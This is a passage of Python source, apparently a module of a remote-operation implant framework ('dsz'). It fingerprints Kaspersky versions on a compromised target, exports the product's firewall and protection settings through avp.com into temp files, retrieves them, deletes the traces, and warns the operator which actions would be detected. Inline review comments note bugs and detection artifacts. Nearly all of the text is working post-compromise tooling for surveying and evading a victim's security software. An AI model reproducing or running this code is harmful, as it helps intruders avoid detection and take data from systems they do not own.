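                # Description) in that order; for i < 2 the negative index reads
                # from the end of the list -- confirm the query layout.
                portValue = regValue[(i - 1)]
                portDesc = regValue[i]
                if (regValue[(i - 2)] == '1'):
                    portEnabled = 'TRUE'
                    kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
                else:
                    portEnabled = 'FALSE'
                # Fixed-width columns (6 / 20 / 7), same widths the old
                # character-at-a-time padding loops produced.
                shared.safePrint(('|      | %s | %s | %s |' % (portValue.ljust(6), portDesc.ljust(20), portEnabled.ljust(7))))
        shared.safePrint('|      +--------+----------------------+---------+')
        shared.safePrint('+--------------------------------------------------------------------------------+')
        kasXmlFilePtr.write('\t</monitored_ports>\n')
        kasXmlFilePtr.write('</kaspersky_settings>\n')
    shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
    shared.safePrint('+--------------------------------------------------------------------------------+')
    shared.safePrint(doNotRun)
    shared.safePrint('+--------------------------------------------------------------------------------+')
    return True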
def main():
    """Fingerprint the Kaspersky product on the target and dispatch to the matching version handler.

    Primary technique: read the ``applications`` and ``processlist`` tables
    of ``target.db`` in the logs directory.  Secondary technique (offered
    only when the applications query does not return exactly one row, and
    only with operator approval): ``registryquery`` against the KasperskyLab
    key of the HKLM software hive on the target.  The identified version is
    then handed to ``ver_six`` / ``ver_nine`` / ``ver_eleven``, each call
    gated by a ``dsz.ui.Prompt``.

    Returns:
        False when no avp.exe process is recorded or the operator declines a
        prompt; True otherwise, including the ``shared.errorBail`` paths and
        the unsupported-version path.
    """
    scriptVer = '1.0.0.6'
    logDir = dsz.lp.GetLogsDirectory()
    sysPid = 0
    usrPid = 0
    kasName = 'UNKNOWN'
    kasDescription = 'UNKNOWN'
    kasVersion = 'UNKNOWN'
    # NOTE(review): the next three lines repeat the assignments just above,
    # kasSubVersion is assigned twice, and kasSubVersion / getFile are never
    # read in this function (kasVerSplit is reassigned before its first use).
    kasName = 'UNKNOWN'
    kasDescription = 'UNKNOWN'
    kasVersion = 'UNKNOWN'
    kasType = 'UNKNOWN'
    kasVerSplit = 'UNKNOWN'
    kasSubVersion = 'UNKNOWN'
    kasRoot = 'UNKNOWN'
    kasSubVersion = 'UNKNOWN'
    getFile = ''
    isWorkstation = False
    isInternetSec = False
    # Primary fingerprint source: a local sqlite inventory of the target.
    dbFile = (logDir + '\\target.db')
    con = sqlite3.connect(dbFile)
    con.row_factory = sqlite3.Row
    cur = con.cursor()
    cur.execute("SELECT NAME, DESCRIPTION, VERSION from applications where DESCRIPTION LIKE '%kaspersky%'")
    kasAppQuery = cur.fetchall()
    cur.execute("SELECT NAME, USER, PID, PATH from processlist where NAME like '%avp.exe'")
    kasProcQuery = cur.fetchall()
    # NOTE(review): missing call parentheses -- these two statements only
    # evaluate the bound methods, so neither the cursor nor the connection
    # is actually closed here.
    cur.close
    con.close
    # logDir was already fetched at the top of the function; redundant.
    logDir = dsz.lp.GetLogsDirectory()
    # NOTE(review): opened for write (which truncates the file) but nothing
    # in this function writes to or closes this handle; the unsupported-
    # version branch near the end opens the same path again on a new handle.
    kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
    myProc = shared.myProc()
    shared.safePrint('+---------------------------------------------------------------------------------')
    shared.safePrint('|   YOUR TARGET APPEARS TO BE RUNNING A KASPERSKYISH PSP!')
    shared.safePrint('|   FOLLOW WIKI GUIDELINES BASED ON VERSION AND TYPE LISTED BELOW!')
    shared.safePrint(('|   PLEASE REMEMBER YOUR PROCESS IS: ' + myProc))
    shared.safePrint(('|   SCRIPT VERSION: ' + scriptVer))
    shared.safePrint('+---------------------------------------------------------------------------------')
    # The script expects exactly two avp.exe rows (one SYSTEM, one user;
    # see the PID loop further down).  Anything else is reported and the
    # operator is asked whether to continue.
    if (2 != len(kasProcQuery)):
        shared.safePrint('|   I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE PROC TABLE QUERY RESULTS...')
        shared.safePrint(('|    THERE SHOULD BE 2 PROCESSES RUNNING; I SEE %d!!!' % len(kasProcQuery)))
        for a in range(len(kasProcQuery)):
            shared.safePrint(('|         %s\t\t%s\t\t%s' % (kasProcQuery[a][1], kasProcQuery[a][0], kasProcQuery[a][2])))
        if (0 == len(kasProcQuery)):
            shared.safePrint('|    NONE- WHY IS THIS SCRIPT RUNNING?!?!?!!?!?!')
            shared.safePrint('|    I AM EXITING BECAUSE I DO NOT THINK YOU HAVE KASPERSKY!')
            shared.safePrint('+---------------------------------------------------------------------------------')
            return False
        elif (1 == len(kasProcQuery)):
            shared.safePrint('|    I ONLY SEE ONE PROCESS RUNNING- THIS MAY BE BECAUSE NO USER IS LOGGED IN')
            shared.safePrint('|    REGARDLESSS, THIS IS NOT NORMAL, AND IF THIS IS KAS 2010 OR 2011 STOP NOW!')
        else:
            # Reached for three or more matching processes.
            shared.safePrint('|    ADDITIONAL PROCESSES MAY BE DUE TO THE PRESENCE OF')
            shared.safePrint('|    AN UPDATE SERVER ON THIS BOX...')
            shared.safePrint('+---------------------------------------------------------------------------------')
        if (not dsz.ui.Prompt('ARE YOU SURE YOU WANT TO CONTINUE?', False)):
            return False
    # Exactly one 'kaspersky' application row is expected; any other count
    # falls back to the registry-based secondary technique.
    if (1 != len(kasAppQuery)):
        shared.safePrint('+---------------------------------------------------------------------------------')
        shared.safePrint('|   I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE APP TABLE QUERY RESULTS...')
        shared.safePrint(('|   THERE SHOULD BE 1 APPLICATION INSTALLED; I SEE %d:' % len(kasAppQuery)))
        for a in range(len(kasAppQuery)):
            shared.safePrint(('|         %s' % kasAppQuery[a][0]))
        if (0 == len(kasAppQuery)):
            shared.safePrint('|        THERE ARE NO MATCHES...')
            shared.safePrint('|        CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS IN RUSSIAN...')
        else:
            shared.safePrint('|        YOU HAVE MULTIPLE KASPERSKY APPLICATIONS...')
            shared.safePrint('|        CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS AN UPDATE SERVER...')
        shared.safePrint('|   I HAVE FAILED TO FINGERPRINT WITH THE PRIMARY TECHNIQUE...')
        if dsz.ui.Prompt('WOULD YOU LIKE ME TO TRY AND FINGERPRINT USING REG KEYS (SECONDARY TECHNIQUE)?', True):
            shared.safePrint('|   QUERYING REGISTRY...')
            # NOTE(review): echo is switched off here and only switched back
            # on at the very end of this branch; every 'return True' after an
            # errorBail below leaves it off.
            dsz.control.echo.Off()
            regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected'
            if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                regCmd = 'registryquery -hive L -key software\\KasperskyLab'
                shared.safePrint('FAILED FIRST REGQUERY')
                if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                    shared.errorBail(('FAILED TO RUN: ' + regCmd))
                    return True
            regName = dsz.cmd.data.Get('key::subkey::name', dsz.TYPE_STRING)
            numInstalls = 0
            # Each subkey name is tested against four loose patterns.  The
            # digit patterns ('.*6.*', '.*80.*', '.*9.*', '.*11.*') are plain
            # substring matches, so one name can satisfy more than one branch
            # and inflate numInstalls; the last matching branch's version /
            # type / root values win.  Only the v9 and v11 branches read
            # productroot, so kasRoot stays 'UNKNOWN' for the v6 branches.
            for i in range(len(regName)):
                if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*6.*', regName[i])):
                    numInstalls += 1
                    shared.safePrint('|   LOOKS LIKE KASPERSKY v6')
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\AVP6\\settings\\ -value Ins_ProductVersion'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasVersion = tempVal[0]
                    shared.safePrint(('|   VERSION: %s' % kasVersion))
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\AVP6\\settings\\ -value Ins_ProductType'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasType = tempVal[0]
                    shared.safePrint(('|   TYPE: %s' % kasType))
                if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*80.*', regName[i])):
                    numInstalls += 1
                    shared.safePrint('|   LOOKS LIKE KASPERSKY v6 MP4')
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\AVP80\\settings -value Ins_ProductVersion'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasVersion = tempVal[0]
                    shared.safePrint(('|   VERSION: %s' % kasVersion))
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\AVP80\\settings -value Ins_ProductType'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasType = tempVal[0]
                    shared.safePrint(('|   TYPE: %s' % kasType))
                if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*9.*', regName[i])):
                    numInstalls += 1
                    shared.safePrint('|   LOOKS LIKE KASPERSKY v9 (AKA KASPERSKY 2010)')
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value ProductVersion'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasVersion = tempVal[0]
                    shared.safePrint(('|   VERSION: %s' % kasVersion))
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value ProductType'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasType = tempVal[0]
                    shared.safePrint(('|   TYPE: %s' % kasType))
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp9\\environment -value productroot'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasRoot = tempVal[0]
                if (re.match('.*AVP.*', regName[i].upper()) and re.match('.*11.*', regName[i])):
                    numInstalls += 1
                    shared.safePrint('|   LOOKS LIKE KASPERSKY v11 (AKA KASPERSKY 2011)')
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value Ins_ProductVersion'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasVersion = tempVal[0]
                    shared.safePrint(('|   VERSION: %s' % kasVersion))
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value Ins_ProductType'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasType = tempVal[0]
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected\\avp11\\environment -value productroot'
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                    tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                    kasRoot = tempVal[0]
                    shared.safePrint(('|   ROOT DIR: %s' % kasRoot))
            if (numInstalls > 1):
                shared.errorBail('THERE ARE MULTIPLE KASPERSKY PSPS ON THE BOX!!!')
                return True
            dsz.control.echo.On()
    else:
        # Primary technique: first application row and first process row.
        # kasType is the process NAME column here (it matched '%avp.exe'), so
        # the 'WKS' / 'KIS' comparisons below can only succeed for values
        # obtained via the registry technique; kasRoot is the PATH column
        # (whether that includes the executable name is not visible here --
        # kasVerEleven appends '\\avp.com' to it).
        kasName = kasAppQuery[0][0]
        kasDescription = kasAppQuery[0][1]
        kasVersion = kasAppQuery[0][2]
        kasType = kasProcQuery[0][0]
        kasRoot = kasProcQuery[0][3]
    if (re.match('.*WORKSTATION.*', kasName.upper()) or ('WKS' == kasType.upper())):
        shared.safePrint('|   IT APPEARS TO BE FOR WORKSTATIONS....')
        isWorkstation = True
    if (re.match('.*SECURITY.*', kasName.upper()) or ('KIS' == kasType.upper())):
        shared.safePrint('|   IT APPEARS TO BE INTERNET SECURITY....')
        isInternetSec = True
    # Split the PIDs by owner.  Both matches are case-sensitive on the USER
    # column ('SYSTEM' upper-case, 'user' lower-case) -- presumably matching
    # how the processlist table stores them; confirm against the collector.
    for i in range(len(kasProcQuery)):
        if re.match('.*SYSTEM.*', kasProcQuery[i][1]):
            sysPid = kasProcQuery[i][2]
        if re.match('.*user.*', kasProcQuery[i][1]):
            usrPid = kasProcQuery[i][2]
    shared.safePrint(('|       PRODUCT NAME:             %s' % kasName))
    shared.safePrint(('|       VERSION:                  %s' % kasVersion))
    # NOTE(review): the two labels below are swapped -- 'SYSTEM PID' prints
    # usrPid and 'USER PID' prints sysPid.
    shared.safePrint(('|       SYSTEM PID:               %d' % usrPid))
    shared.safePrint(('|       USER PID:                 %d' % sysPid))
    shared.safePrint('+---------------------------------------------------------------------------------')
    # kasVersion defaults to 'UNKNOWN', so this test normally passes and an
    # unidentified install ends up in the 'unsupported' branch below.
    if (kasVersion != ''):
        kasVerSplit = kasVersion.split('.')
        if (('6' == kasVerSplit[0]) and isWorkstation):
            # NOTE(review): indexes the third dotted component; a version
            # string with fewer than three parts raises IndexError here.
            if ('4' == kasVerSplit[2]):
                if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS MP4?', True):
                    shared.safePrint('+---------------------------------------------------------------------------------')
                    shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 6 MP4 FOR WINDOWS WORKSTATIONS....')
                    ver_six.kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot)
                else:
                    return False
            elif dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS (NOT MP4)?', True):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 6 FOR WINDOWS WORKSTATIONS (NOT MP4)....')
                ver_six.kasVerSix(kasName, kasDescription, kasVersion, kasRoot)
            else:
                return False
        elif (('9' == kasVerSplit[0]) and isInternetSec):
            if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 9 (AKA 2010)?', True):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 9 (AKA 2010)....')
                ver_nine.kasVerNine(kasName, kasDescription, kasVersion, kasRoot)
            else:
                return False
        elif (('11' == kasVerSplit[0]) and isInternetSec):
            if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 11 (AKA 2011)?', True):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 11 (AKA 2011)....')
                ver_eleven.kasVerEleven(kasName, kasDescription, kasVersion, kasRoot)
            else:
                return False
        else:
            # Unsupported (or unidentified) version: record what was learned
            # in a minimal settings file and stop.
            shared.safePrint('|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
            shared.safePrint('|   THIS VERSION APPEARS TO BE UNSUPPORTED.  PLEASE HARASS THOSE RESPONSIBLE.')
            shared.safePrint('|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
            shared.safePrint('+---------------------------------------------------------------------------------')
            # Rebinding the name drops the handle opened earlier without
            # closing it.
            kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
            try:
                kasXmlFilePtr.write('<kaspersky_settings>\n')
                kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
                kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
                # NOTE(review): <description> is closed with </vendor>, which
                # makes the file ill-formed XML; kasVerEleven writes the same
                # element with the correct </description> closing tag.
                kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</vendor>\n'))
                kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
                kasXmlFilePtr.write('</kaspersky_settings>\n')
            finally:
                kasXmlFilePtr.close()
    else:
        # Only reachable if a data source returned an empty version string.
        # (Runtime string contains the typo 'PARISNG'; left as is.)
        shared.safePrint(('ERRORED PARISNG %s FOR VERSION!' % kasVersion))
    return True
def kasVerEleven(kasName, kasDescription, kasVersion, kasRoot):
    """Collect and parse the settings of a Kaspersky 2011 (v11) install.

    When the product name contains 'ANTI' only a notice is printed.
    Otherwise, for each of four exports (rtp and fw, each as .txt and
    .dat): the target's avp.com is run with ``export <type>`` to write
    ``~klset.txt`` / ``~klset.dat`` into the Windows temp directory, the
    file is retrieved with ``foreground get``, the .txt ones are appended
    to ``kastemp.txt`` in the logs directory, and the file is deleted on
    target again.  ``kastemp.txt`` is then parsed line by line and the
    findings are written to ``kasperskyfile.xml`` and printed as a summary.

    Host-visible artifacts of this routine (useful for hunting / detection):
    an avp.com process launched with an ``export rtp`` or ``export fw``
    argument, and the short-lived ``~klset.*`` files in the temp directory.

    Args:
        kasName: product name; only tested for the substring 'ANTI'.
        kasDescription: not used by this function.
        kasVersion: written to the <version> element.
        kasRoot: directory avp.com is expected to live in.

    Returns:
        False if one of the export files already exists on target before it
        is created (the function bails immediately); True otherwise.
    """
    if re.match('.*ANTI.*', kasName.upper()):
        shared.safePrint('|   IT APPEARS TO BE ANTI-VIRUS ONLY...  YOU DO NOT NEED ME.')
        shared.safePrint('+---------------------------------------------------------------------------------')
        # kasFlavor is assigned in both branches but never read.
        kasFlavor = 'ANTIVIRUS'
    else:
        kasFlavor = 'SECURITY'
        logDir = dsz.lp.GetLogsDirectory()
        # copyCmd is never used.
        copyCmd = 'cmd /C copy '
        # Opened here; written and closed only in the try/finally at the end
        # of this branch, so an early 'return False' below leaks the handle.
        kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
        shared.safePrint('|   THIS NEW VERSION OF THE KASPERSKY 2011 SCRIPT USES DATA RETRIEVED FROM THE')
        shared.safePrint('|   ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.')
        shared.safePrint('|   THIS MEANS THAT WE WILL CREATE FOUR FILES ON TARGET, DOWNLOAD THEM, AND DELETE')
        shared.safePrint('|   THEM.  PLEASE ENSURE THAT THE SCRIPT REMOVES THESE FILES CORRECTLY.')
        shared.safePrint('|   GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 500K.')
        shared.safePrint('|   IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE')
        shared.safePrint('|   QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.')
        shared.safePrint('+---------------------------------------------------------------------------------')
        shared.safePrint('|                        ***** NEW FOR VERSION 2011 ****')
        shared.safePrint('|   KASPERSKY 2011 DOES NOT ALLOW FOR THE SIMPLE EXFIL OF DATA TO A SINGLE FILE.')
        shared.safePrint('|   AS SUCH, WE MUST CREATE 4 FILES ON TARGET (2xTXT 2xDAT), RETRIEVE THEM,')
        shared.safePrint('|   CONCATENATE THEM LOCALLY, AND FINALLY, PARSE THEM.')
        shared.safePrint('|   THIS IS NOT A QUICK PROCESS AND WILL LIKELY TAKE ~5-10 MINUTES.')
        shared.safePrint('|                        ***** PATIENCE IS A VIRTUE *****')
        shared.safePrint('+---------------------------------------------------------------------------------')
        # NOTE(review): worded as a yes/no question but issued via Pause,
        # not Prompt as elsewhere in this file; whether Pause can abort is
        # not visible here -- confirm.
        dsz.ui.Pause('DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)')
        (tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
        tarTempDir = (tarWinDir + '\\temp')
        kasOutFile = ''
        exportType = ''
        # NOTE(review): echo is switched off here and never switched back on
        # anywhere in this function.
        dsz.control.echo.Off()
        tempFileName = (logDir + '\\kastemp.txt')
        # devNull is never used.
        devNull = ''
        # Creates/truncates the concatenation target; 'local run' presumably
        # executes on the operator side since tempFileName is under logDir.
        tempCmd = (('local run -command "cmd /C type NUL > ' + tempFileName) + '" -redirect')
        dsz.cmd.Run(tempCmd)
        # i = 0,1 -> rtp export (.txt then .dat); i = 2,3 -> fw export.
        for i in range(4):
            if (i == 0):
                exportType = 'rtp'
            if (i == 2):
                exportType = 'fw'
            if ((i % 2) == 0):
                kasOutFile = '~klset.txt'
            else:
                kasOutFile = '~klset.dat'
            # Refuse to overwrite a pre-existing file of the same name.
            if dsz.file.Exists(kasOutFile, tarTempDir):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint(('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' % (tarTempDir, kasOutFile)))
                shared.safePrint('|\t!!!SEEK HELP IMMEDIATELY!!!   !!!BAILING FROM SCRIPT!!!')
                shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
                shared.safePrint('+---------------------------------------------------------------------------------')
                dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
                return False
            else:
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint(('|   CREATING FILE %d OF 4 ON TARGET....' % (i + 1)))
                # Runs "<kasRoot>\avp.com" export <type> "<tarTempDir>\<file>"
                # on the target.  getFile is bound only inside this success
                # branch.
                if dsz.cmd.Run((((((((('run -command "\\"' + kasRoot) + '\\avp.com\\" export ') + exportType) + ' \\"') + tarTempDir) + '\\') + kasOutFile) + '\\"" -redirect')):
                    shared.safePrint(('|     SUCCESSFULLY CREATED %s\\%s ON TARGET' % (tarTempDir, kasOutFile)))
                    dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') + kasOutFile), dsz.RUN_FLAG_RECORD)
                    [getFile] = dsz.cmd.data.Get('filelocalname::localname', dsz.TYPE_STRING)
                # Only the .txt exports are concatenated; the .dat files are
                # retrieved but not read by this function.
                # NOTE(review): if the export on i == 0 fails, getFile is
                # unbound here; if a later export fails, the previous
                # iteration's getFile is appended again.
                if ((i % 2) == 0):
                    tempCmd = (((((('local run -command "cmd /C type ' + logDir) + '\\GetFiles\\') + getFile) + ' >> ') + tempFileName) + '" -redirect')
                    dsz.cmd.Run(tempCmd)
                # Clean-up on target, with an existence re-check and a dir
                # listing as evidence.
                if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
                    shared.safePrint(('|     SUCCESSFULLY DELETED %s\\%s ON TARGET' % (tarTempDir, kasOutFile)))
                    if dsz.file.Exists(kasOutFile, tarTempDir):
                        shared.safePrint(('PLEASE CHECK THE STATUS OF THE FILE %s\\%s ON TARGET!!!' % (tarTempDir, kasOutFile)))
                        dsz.ui.Pause(('!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!' % (tarTempDir, kasOutFile)))
                    else:
                        shared.safePrint(('|     VERIFIED DELETION OF FILE %s\\%s FROM TARGET' % (tarTempDir, kasOutFile)))
                        # Compared with '== 0' here, '!= True' in kasVerNine.
                        if (dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile)) == 0):
                            shared.safePrint('|   DIRECTORY LISTING FAILED')
                else:
                    shared.safePrint(('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
                    # Path printed with '/' here, '\\' everywhere else.
                    dsz.ui.Pause(('!!! VERIFY THAT THE FILE %s/%s IS NOT ON TARGET!!!' % (tarTempDir, kasOutFile)))
        shared.safePrint('+---------------------------------------------------------------------------------')
        dsz.ui.Pause('PLEASE CHECK THE ABOVE OUTPUTS TO ENSURE ALL FILES WERE DELETED.')
        # Outer try: guarantees the closing tag is written and the XML file
        # closed even if parsing below raises.
        try:
            kasXmlFilePtr.write('<kaspersky_settings>\n')
            kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
            kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
            kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
            kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
            shared.safePrint(('|  ATTEMPTING TO OPEN FILE: ' + tempFileName))
            kasFilePtr = open(tempFileName)
            # Section-state flags: set when a section header is seen, cleared
            # once the first 'enabled' line of that section is consumed.
            swLevel = 0
            fwLevel = 0
            inRegGuard = 0
            fireWallStatus = 'UNKNOWN'
            allPortMonitoring = 'UNKNOWN'
            fileSystemMonitor = 'UNKNOWN'
            logRegEvents = 'UNKNOWN'
            logNonCrit = 'UNKNOWN'
            sysAccountWatch = 'UNKNOWN'
            # printFlag is never used.
            printFlag = False
            try:
                # Single pass over the concatenated rtp + fw text exports.
                # Several tests use '.*no.*' / '.*yes.*', which are plain
                # substring matches (e.g. 'no' also matches inside other
                # words); the export format is not visible here -- confirm.
                for line in kasFilePtr:
                    if re.match('.*[+] SW2.*', line):
                        swLevel = 1
                    if (re.match('.*enabled.*', line) and (swLevel == 1)):
                        if re.match('.*yes.*', line):
                            sysAccountWatch = 'ENABLED'
                        elif re.match('.*no.*', line):
                            sysAccountWatch = 'DISABLED'
                        kasXmlFilePtr.write((('<sys_acc_watch>' + shared.xmlScrub(sysAccountWatch)) + '</sys_acc_watch>\n'))
                        swLevel = 0
                    if re.match('.*LogFiles.*', line):
                        fileSystemMonitor = 'ENABLED'
                        if re.match('.*no.*', line):
                            fileSystemMonitor = 'DISABLED'
                        kasXmlFilePtr.write((('<file_sys_logging>' + shared.xmlScrub(fileSystemMonitor)) + '</file_sys_logging>\n'))
                    if re.match('.*LogReg.*', line):
                        logRegEvents = 'ENABLED'
                        if re.match('.*no.*', line):
                            logRegEvents = 'DISABLED'
                        kasXmlFilePtr.write((('<reg_event_logging>' + shared.xmlScrub(logRegEvents)) + '</reg_event_logging>\n'))
                    if re.match('.*FullReport.*', line):
                        logNonCrit = 'ENABLED'
                        if re.match('.*no.*', line):
                            logNonCrit = 'DISABLED'
                        kasXmlFilePtr.write((('<noncrit_event_logging>' + shared.xmlScrub(logNonCrit)) + '</noncrit_event_logging>\n'))
                    # NOTE(review): '$' in the middle of the pattern means this
                    # only matches when 'Firewall' is followed by exactly one
                    # character at the end of the line (the trailing '.*' can
                    # match nothing after '$'); same for the 'Resource' test
                    # below.  Presumably a section-header shape -- confirm.
                    if re.match('.*[+].*Firewall.$.*', line):
                        fwLevel = 1
                    if ((1 == fwLevel) and re.match('.*enabled.*', line)):
                        if re.match('.*no.*', line):
                            fireWallStatus = 'DISABLED'
                        else:
                            fireWallStatus = 'ENABLED'
                        kasXmlFilePtr.write((('<firewall_status>' + shared.xmlScrub(fireWallStatus)) + '</firewall_status>\n'))
                        fwLevel = 0
                    if re.match('.*AllPorts.*', line):
                        if re.match('.*yes.*', line):
                            allPortMonitoring = 'ENABLED'
                        else:
                            allPortMonitoring = 'DISABLED'
                    # fwActionBlock is bound only after a vRuleList_vcontent
                    # line has been seen.
                    if re.match('.*vRuleList_vcontent.*', line):
                        splitFw = line.split(' ')
                        fwActionBlock = splitFw[2]
                    # Captures a hex run bracketed by two fixed byte sequences;
                    # the meaning of those constants is not documented here.
                    m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?', line)
                    if m:
                        fwRules = m.group(1)
                        # NOTE(review): raises UnboundLocalError if a rule line
                        # precedes the first vRuleList_vcontent line.
                        shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
                    if re.match('.*[+].*Resource.$.*', line):
                        inRegGuard = 1
                    if (re.match('.*Childs_vcontent.*', line) and (inRegGuard == 1)):
                        shared.lateKasRegRules(line, kasXmlFilePtr)
                        inRegGuard = 0
                    # The hex literal is the ASCII encoding of 'KLAppTrusted'.
                    if re.match('.*4b4c41707054727573746564.*', line):
                        shared.lateKasAppRules(line, kasXmlFilePtr)
                # regGetGmd (sic) is never used.
                regGetGmd = ''
                # The monitored-port list is still read from the registry
                # despite the banner text above saying the registry is no
                # longer queried.  Return value of Run is not checked; an
                # empty result would make the unpacking below raise.
                regGetCmd = 'registryquery -hive l -key SOFTWARE\\KasperskyLab\\protected\\AVP11\\profiles\\TrafficMonitor\\settings\\ -value Ports_vcontent'
                dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
                [regValue] = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
                shared.lateKasPortMon(regValue, kasXmlFilePtr)
